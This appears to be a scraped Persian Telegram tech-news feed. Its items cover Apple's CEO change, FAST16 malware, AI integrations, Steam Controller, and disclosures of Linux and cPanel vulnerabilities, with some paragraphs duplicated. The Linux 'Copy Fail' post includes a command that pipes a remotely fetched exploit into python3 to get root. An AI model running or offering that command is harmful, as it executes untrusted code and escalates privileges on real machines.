همونطور که انتظار میرفت، شرکت اپل اعلام کرده که تیم کوک ۶۵ ساله، مدیرعامل فعلی این شرکت، از اول ماه سپتامبر و قبل از معرفی آیفونهای جدید، از این سمت کنارهگیری میکنه و جان ترنوس، معاون ارشد بخش مهندسی سختافزار اپل، سکان رهبری اپل رو در دست خواهد گرفت.
تیم کوک بعد از مرگ استیو جابز و در سال ۲۰۱۱ مدیرعامل اپل شد و در دوران مدیریت اون، اپل رشد فوقالعادهای رو تجربه کرد بهطوری که درآمد این شرکت در دوران مدیریت اون بیش از ۴ برابر و ارزش این شرکت بیش از ۱۱ برابر افزایش یافت. در دوران مدیریت تیم کوک اپل محصولات بسیار موفقی همچون اپلواچ رو عرضه کرد که در حال حاضر بیش از ۲۵ درصد کل فروش ساعتهای هوشمند جهان رو تشکیل میده. ولی بیشتر محصولات عرضه شده در دوران اون انقلابی نبودن و محصولات جدید این شرکت همچون هدست واقعیت مجازی Vision Pro آنچنان که انتظار میرفت، موفق ظاهر نشدن.
جان ترنوس ۵۱ ساله (همون سنی که تیم کوک مدیرعامل اپل شد)، در سال ۲۰۰۱ و بعد از کار کردن در شرکت مرتبط با واقعیت مجازی به تیم طراحی محصول اپل ملحق شد، در سال ۲۰۱۳ به سمت معاون مهندسی سختافزار منصوب شد و در سال ۲۰۲۱ به معاون ارشد بخش مهندسی سختافزار ارتقای سمت داده شد و به جوانترین عضو تیم اجرایی تبدیل شد. در طی یک دهه گذشته تأثیر ایشون روی محصولات عرضه شده توسط اپل روز به روز بیشتر شده و بیش از پیش در معرفی محصولات حضور داشته.
با مدیرعامل شدن جان ترنوس، آقای جانی سروجی، معاون ارشد تکنولوژیهای سختافزاری اپل، از حالا به مدیر ارشد سختافزار اپل ارتقای سمت داده میشه تا مدیریت کامل سختافزار اپل رو در دستش بگیره. آقای سروجی در سال ۲۰۰۸ به اپل ملحق شد و تیم اون در سال ۲۰۱۰ اولین چیپ اختصاصی اپل رو برای آیفون و آیپد طراحی کردن و از اون موقع شاهد چیپهای قدرتمند سری A و M و توسعه هر چه بیشتر چیپهای اختصاصی اپل توسط این تیم زیر دست ایشون بودیم.
🔎 techcrunch
📍 @TechTube
تیم کوک بعد از مرگ استیو جابز و در سال ۲۰۱۱ مدیرعامل اپل شد و در دوران مدیریت اون، اپل رشد فوقالعادهای رو تجربه کرد بهطوری که درآمد این شرکت در دوران مدیریت اون بیش از ۴ برابر و ارزش این شرکت بیش از ۱۱ برابر افزایش یافت. در دوران مدیریت تیم کوک اپل محصولات بسیار موفقی همچون اپلواچ رو عرضه کرد که در حال حاضر بیش از ۲۵ درصد کل فروش ساعتهای هوشمند جهان رو تشکیل میده. ولی بیشتر محصولات عرضه شده در دوران اون انقلابی نبودن و محصولات جدید این شرکت همچون هدست واقعیت مجازی Vision Pro آنچنان که انتظار میرفت، موفق ظاهر نشدن.
جان ترنوس ۵۱ ساله (همون سنی که تیم کوک مدیرعامل اپل شد)، در سال ۲۰۰۱ و بعد از کار کردن در شرکت مرتبط با واقعیت مجازی به تیم طراحی محصول اپل ملحق شد، در سال ۲۰۱۳ به سمت معاون مهندسی سختافزار منصوب شد و در سال ۲۰۲۱ به معاون ارشد بخش مهندسی سختافزار ارتقای سمت داده شد و به جوانترین عضو تیم اجرایی تبدیل شد. در طی یک دهه گذشته تأثیر ایشون روی محصولات عرضه شده توسط اپل روز به روز بیشتر شده و بیش از پیش در معرفی محصولات حضور داشته.
با مدیرعامل شدن جان ترنوس، آقای جانی سروجی، معاون ارشد تکنولوژیهای سختافزاری اپل، از حالا به مدیر ارشد سختافزار اپل ارتقای سمت داده میشه تا مدیریت کامل سختافزار اپل رو در دستش بگیره. آقای سروجی در سال ۲۰۰۸ به اپل ملحق شد و تیم اون در سال ۲۰۱۰ اولین چیپ اختصاصی اپل رو برای آیفون و آیپد طراحی کردن و از اون موقع شاهد چیپهای قدرتمند سری A و M و توسعه هر چه بیشتر چیپهای اختصاصی اپل توسط این تیم زیر دست ایشون بودیم.
🔎 techcrunch
📍 @TechTube
❤50😁6🌭3💋3⚡1🐳1💘1
Forwarded from OpenPCB
محققهای SentinelLABS یه بدافزار خیلی قدیمی و عجیب به اسم FAST16 رو پیدا کردن که دیپلوی اون برمیگرده به سال ۲۰۰۵، یعنی دقیقا پنج سال قبل از استاکسنت، و عملا اولین عملیات خرابکارانه نرمافزاری با دقت بالا تو تاریخ حملات سایبری به حساب میاد.
معماری این بدافزار دو تا کامپوننت اصلی داره، اولی یه Carrier به اسم svcmgmt.exe هست که یه ماشین مجازی Lua رو تو خودش امبد کرده و مثل یه کرم از طریق شبکه و سرویسهای ویندوز بین سیستمهای شبکه پخش میشه، فایلها رو کپی میکنه و اسکریپتهای Lua رو ران میکنه. بخش دوم یه Kernel Driver به اسم fast16.sys هست که تو سطح کرنل ویندوزهای ۲۰۰۰ و XP میشینه و مستقیما کد اجرایی نرمافزار هدف رو تو حافظه دستکاری میکنه. مکانیزمش اینطوریه که فقط دنبال باینریهایی میگرده که با کامپایلر Intel C/C++ بیلد شده باشن و اینو از روی اسم فایل و یه استرینگ خاص تو هدر PE چک میکنه. وقتی نرمافزار هدف اجرا میشه، درایور با استفاده از ۱۰۱ تا قانون خاص، سکشنهای xdata. و pdata. رو دستکاری میکنه و دستورات FPU رو تغییر میده تا محاسبات floating-point رو نامحسوس خراب کنه.
این یعنی تو برنامههایی مثل شبیهسازیهای فیزیک، مهندسی عمران، رمزنگاری یا تحقیقات هستهای(که انگار هدف اصلی همین بوده)، نتایج محاسبات به صورت سیستماتیک دستکاری و تحریف میشن، بدون اینکه برنامه کرش کنه یا یوزر متوجه اشتباه بودن و غیر طبیعی بودن نتایج بشه، که خیلی با رویکرد استاکسنت که مستقیما PLC ها رو هدف قرار میداد، فرق داره.
از اهداف احتمالی که تحلیل شدن میشه به نرمافزارهای LS-DYNA 970 برای شبیهسازی انفجار که تو برنامه AMAD کاربرد داشته، PKPM برای مهندسی سازه تو چین و MOHID برای مدلسازی هیدرودینامیک اشاره کرد.
لینک شدن این بدافزار به NSA و Shadow Brokers از اونجا میاد که اسم fast16 دقیقا تو لیست درایورهای لیک شده سال ۲۰۱۷ تحت عنوان drv_list.txt وجود داشت و جلوش به عنوان یه deconfliction signature نوشته شده بود که کاری بهش نداشته باشین تا اپراتورهای خودی باهاش تداخل پیدا نکنن، و مچ شدن PDB path تو خود بدافزار هم این ارتباط رو کاملا تایید میکنه.
از نظر تاریخی این بدافزار که تقریبا کشفنشده مونده بود نشون میده که از اواسط دهه ۲۰۰۰، یه سازمان دولتی تو لول NSA این قابلیت رو داشته که محاسبات پیچیده و حساس علمی و هستهای کشورهای دیگه رو در خفا و کاملا بیسروصدا دستکاری و خراب کنه.
مقاله اصلی رو میتونید اینجا بخونید.
📡openpcb
معماری این بدافزار دو تا کامپوننت اصلی داره، اولی یه Carrier به اسم svcmgmt.exe هست که یه ماشین مجازی Lua رو تو خودش امبد کرده و مثل یه کرم از طریق شبکه و سرویسهای ویندوز بین سیستمهای شبکه پخش میشه، فایلها رو کپی میکنه و اسکریپتهای Lua رو ران میکنه. بخش دوم یه Kernel Driver به اسم fast16.sys هست که تو سطح کرنل ویندوزهای ۲۰۰۰ و XP میشینه و مستقیما کد اجرایی نرمافزار هدف رو تو حافظه دستکاری میکنه. مکانیزمش اینطوریه که فقط دنبال باینریهایی میگرده که با کامپایلر Intel C/C++ بیلد شده باشن و اینو از روی اسم فایل و یه استرینگ خاص تو هدر PE چک میکنه. وقتی نرمافزار هدف اجرا میشه، درایور با استفاده از ۱۰۱ تا قانون خاص، سکشنهای xdata. و pdata. رو دستکاری میکنه و دستورات FPU رو تغییر میده تا محاسبات floating-point رو نامحسوس خراب کنه.
این یعنی تو برنامههایی مثل شبیهسازیهای فیزیک، مهندسی عمران، رمزنگاری یا تحقیقات هستهای(که انگار هدف اصلی همین بوده)، نتایج محاسبات به صورت سیستماتیک دستکاری و تحریف میشن، بدون اینکه برنامه کرش کنه یا یوزر متوجه اشتباه بودن و غیر طبیعی بودن نتایج بشه، که خیلی با رویکرد استاکسنت که مستقیما PLC ها رو هدف قرار میداد، فرق داره.
از اهداف احتمالی که تحلیل شدن میشه به نرمافزارهای LS-DYNA 970 برای شبیهسازی انفجار که تو برنامه AMAD کاربرد داشته، PKPM برای مهندسی سازه تو چین و MOHID برای مدلسازی هیدرودینامیک اشاره کرد.
لینک شدن این بدافزار به NSA و Shadow Brokers از اونجا میاد که اسم fast16 دقیقا تو لیست درایورهای لیک شده سال ۲۰۱۷ تحت عنوان drv_list.txt وجود داشت و جلوش به عنوان یه deconfliction signature نوشته شده بود که کاری بهش نداشته باشین تا اپراتورهای خودی باهاش تداخل پیدا نکنن، و مچ شدن PDB path تو خود بدافزار هم این ارتباط رو کاملا تایید میکنه.
از نظر تاریخی این بدافزار که تقریبا کشفنشده مونده بود نشون میده که از اواسط دهه ۲۰۰۰، یه سازمان دولتی تو لول NSA این قابلیت رو داشته که محاسبات پیچیده و حساس علمی و هستهای کشورهای دیگه رو در خفا و کاملا بیسروصدا دستکاری و خراب کنه.
مقاله اصلی رو میتونید اینجا بخونید.
📡openpcb
🤯88❤3🤬3👌3🔥2👏1😁1💔1👨💻1
@TgAdsPlatformBot
Please open Telegram to view this post
VIEW IN TELEGRAM
🍌60😁16🌭6🤬3❤2🎉1
شرکت انتروپیک به بنیاد Blender کمک مالی کرده و پشتیبانی از این نرمافزار طراحی سهبعدی رو به هوش مصنوعی Claude هم اضافه کرده تا این هوش مصنوعی با وصل شدن به بلندر بتونه کارهای تکراری کاربر رو انجام بده.
این شرکت همچنین پشتیبانی از نرمافزار Autodesk Fusion رو هم اضافه کرده که به طراحان و مهندسان در طراحی و ویرایش مدلها و قطعات سهبعدی کمک میکنه.
🔎 anthropic
📍 @TechTube
این شرکت همچنین پشتیبانی از نرمافزار Autodesk Fusion رو هم اضافه کرده که به طراحان و مهندسان در طراحی و ویرایش مدلها و قطعات سهبعدی کمک میکنه.
🔎 anthropic
📍 @TechTube
🔥52❤5🤩4🥴2
با اینکه هنوز خبری از عرضه Steam Machine نیست، ولی شرکت Valve زمان عرضه و قیمت Steam Controller رو منتشر کرده که دسته بازیای با چینشی مشابه Steam Deck داره، دو ترکپد در پایینش قراره گرفته که برای کنترل رابط کاربری همانند ماوس کاربردیه و میشه بازیهایی که برای ماوس بهینه شدن رو با دسته هم بازی کرد. علاوه بر این از جویاستیکهای مغناطیسی TMR استفاده میکنه که نگرانیای از بابت Drift کردن اونها وجود نداره.
این دسته هم از طریق بلوتوث و هم از طریق دانگل مخصوص اون که حکم شارژ رو هم داره به دستگاههای مختلف متصل میشه، عمر باتری اون ۳۵ ساعت هست و از ۴ می با قیمت ۱۰۰ دلار قابل خریده.
🔎 theverge
📍 @TechTube
این دسته هم از طریق بلوتوث و هم از طریق دانگل مخصوص اون که حکم شارژ رو هم داره به دستگاههای مختلف متصل میشه، عمر باتری اون ۳۵ ساعت هست و از ۴ می با قیمت ۱۰۰ دلار قابل خریده.
🔎 theverge
📍 @TechTube
💔19❤9🌚3😁1
This media is not supported in your browser
VIEW IN TELEGRAM
هوش مصنوعی جمنای از حالا میتونه فایلهای مختلف از جمله PDF، ورد، اکسل، فایلهای متنی و غیره براساس موضوع مدنظرتون بسازه تا بتونین اونهارو به راحتی دانلود کنید.
🔎 GeminiApp
📍 @TechTube
🔎 GeminiApp
📍 @TechTube
❤🔥55💔12❤9🔥6
محقق شرکت امنیتی Theori با کمک پلتفرم تست نفوذ با هوش مصنوعی Xint موفق شده حفره امنیتی خطرناکی در هسته لینوکس رو کشف کنه که به هر فایل اجرایی امکان گرفتن دسترسی روت روی تقریبا هر توزیع لینوکسی رو فراهم میکنه!
این حفره موسوم به Copy Fail با کد CVE-2026-31431 به دلیل باگی در سیستم کش فایل هسته لینوکس به وجود اومده که با دستکاری باینری کش شده setuid-root میتونه دسترسی روت دریافت کنه و کل سیستم رو کنترل کنه و مخفی بمونه. حتی در برخی حالات امکان دسترسی به هاست از داخل یک کانتینرها هم میتونه ممکن باشه!
این باگ تقریبا روی هر توزیعی که از هسته لینوکسِ عرضه شده از سال ۲۰۱۷ تاکنون استفاده میکنه، قابل اجرا هست و روی توزیعهایی مثل Ubuntu، SUSE، RHEL و غیره تست شده.
برای استفاده از اون فقط کافیه یک فایل ۷۳۲ بایتی پایتون رو اجرا کرد تا در کسری از ثانیه روی سیستمی با یوزر عادی، دسترسی روت بگیره. کدهای اون هم با بقیه زبانها از جمله Go هم پیادهسازی شدن. برای تست راحت اون (که نیاز به اینترنت برای دریافت کدها داره) میتونید از دستور زیر استفاده کنید:
در حال حاضر این باگ در آپدیت جدید هسته لینوکس اصلاح شده ولی فقط توزیعهای مبتنی بر ارچ این آپدیت رو اعمال کردن و توزیعهای دیگه از جمله اوبونتو، دبیان و فدورا همچنان در حال رفع این باگ هستن.
🔎 xint
📍 @TechTube
این حفره موسوم به Copy Fail با کد CVE-2026-31431 به دلیل باگی در سیستم کش فایل هسته لینوکس به وجود اومده که با دستکاری باینری کش شده setuid-root میتونه دسترسی روت دریافت کنه و کل سیستم رو کنترل کنه و مخفی بمونه. حتی در برخی حالات امکان دسترسی به هاست از داخل یک کانتینرها هم میتونه ممکن باشه!
این باگ تقریبا روی هر توزیعی که از هسته لینوکسِ عرضه شده از سال ۲۰۱۷ تاکنون استفاده میکنه، قابل اجرا هست و روی توزیعهایی مثل Ubuntu، SUSE، RHEL و غیره تست شده.
برای استفاده از اون فقط کافیه یک فایل ۷۳۲ بایتی پایتون رو اجرا کرد تا در کسری از ثانیه روی سیستمی با یوزر عادی، دسترسی روت بگیره. کدهای اون هم با بقیه زبانها از جمله Go هم پیادهسازی شدن. برای تست راحت اون (که نیاز به اینترنت برای دریافت کدها داره) میتونید از دستور زیر استفاده کنید:
curl https://copy.fail/exp | python3 && su
در حال حاضر این باگ در آپدیت جدید هسته لینوکس اصلاح شده ولی فقط توزیعهای مبتنی بر ارچ این آپدیت رو اعمال کردن و توزیعهای دیگه از جمله اوبونتو، دبیان و فدورا همچنان در حال رفع این باگ هستن.
🔎 xint
📍 @TechTube
❤34😱18🔥2💔1😭1🙈1
شرکت امنیتی watchtowr اسیب پذیری روز صفری رو در پنل مدیریت هاست cPanel کشف کرده که به مهاجم بدون نیاز به لاگین، امکان دسترسی به پنل هاست، تنظیمات سرور و دیتابیسهارو فراهم میکنه!
این اسیب پذیری با کد CVE-2026-41940 و میزان خطر 9.8 از 10 شناخته شده و به دلیل باگی در سیستم پردازش سشنهای cPanel و با دستکاری کوکیها از جانب مهاجم، به اون امکان گذر از سد لاگین رو میده.
برای اصلاح این اسیب پذیری خطرناک، cPanel اپدیتهایی رو عرضه کرده و هر نسخه ای قبل از این نسخه ها، دارای این اسیب پذیری هست:
شرکت Cloudflare هم برای سایتهایی که از CDN این شرکت استفاده میکنن، اقداماتی برای جلوگیری از حمله در سمت خودش، تا زمان اپدیت شدن سرورها، انجام داده.
پنل cPanel توسط میلیونها وب سایت از جمله بسیاری از هاستهای ایرانی استفاده میشه و متاسفانه به دلیل قطعی اینترنت خیلی از اونها امکان اپدیت کردن به این نسخه ندارن!
🔎 rapid7
📍 @TechTube
این اسیب پذیری با کد CVE-2026-41940 و میزان خطر 9.8 از 10 شناخته شده و به دلیل باگی در سیستم پردازش سشنهای cPanel و با دستکاری کوکیها از جانب مهاجم، به اون امکان گذر از سد لاگین رو میده.
برای اصلاح این اسیب پذیری خطرناک، cPanel اپدیتهایی رو عرضه کرده و هر نسخه ای قبل از این نسخه ها، دارای این اسیب پذیری هست:
11.86.0.41
11.110.0.97
11.118.0.63
11.126.0.54
11.130.0.19
11.132.0.29
11.136.0.5
11.134.0.20
شرکت Cloudflare هم برای سایتهایی که از CDN این شرکت استفاده میکنن، اقداماتی برای جلوگیری از حمله در سمت خودش، تا زمان اپدیت شدن سرورها، انجام داده.
پنل cPanel توسط میلیونها وب سایت از جمله بسیاری از هاستهای ایرانی استفاده میشه و متاسفانه به دلیل قطعی اینترنت خیلی از اونها امکان اپدیت کردن به این نسخه ندارن!
🔎 rapid7
📍 @TechTube
💔37😈6❤🔥1❤1
مایکروسافت در اپدیت جدید مجموعه ابزارهای کاربردی PowerToys امکان کنترل نمایشگر رو با ابزار Power Display اضافه کرده و کاربران از طریق اون میتونن روشنایی، کنتراست و ورودی تصویر مانیتورشون رو بدون نیاز به دستکاری تنظیمات از طریق دکمه های فیزیکی مانیتور، تغییر بدن.
این اپدیت جدید از طریق گیتهاب برای ویندوز 10 و 11 قابل دانلود هست.
🔎 microsoft.com
📍 @TechTube
این اپدیت جدید از طریق گیتهاب برای ویندوز 10 و 11 قابل دانلود هست.
🔎 microsoft.com
📍 @TechTube
❤🔥29🌭11❤3⚡2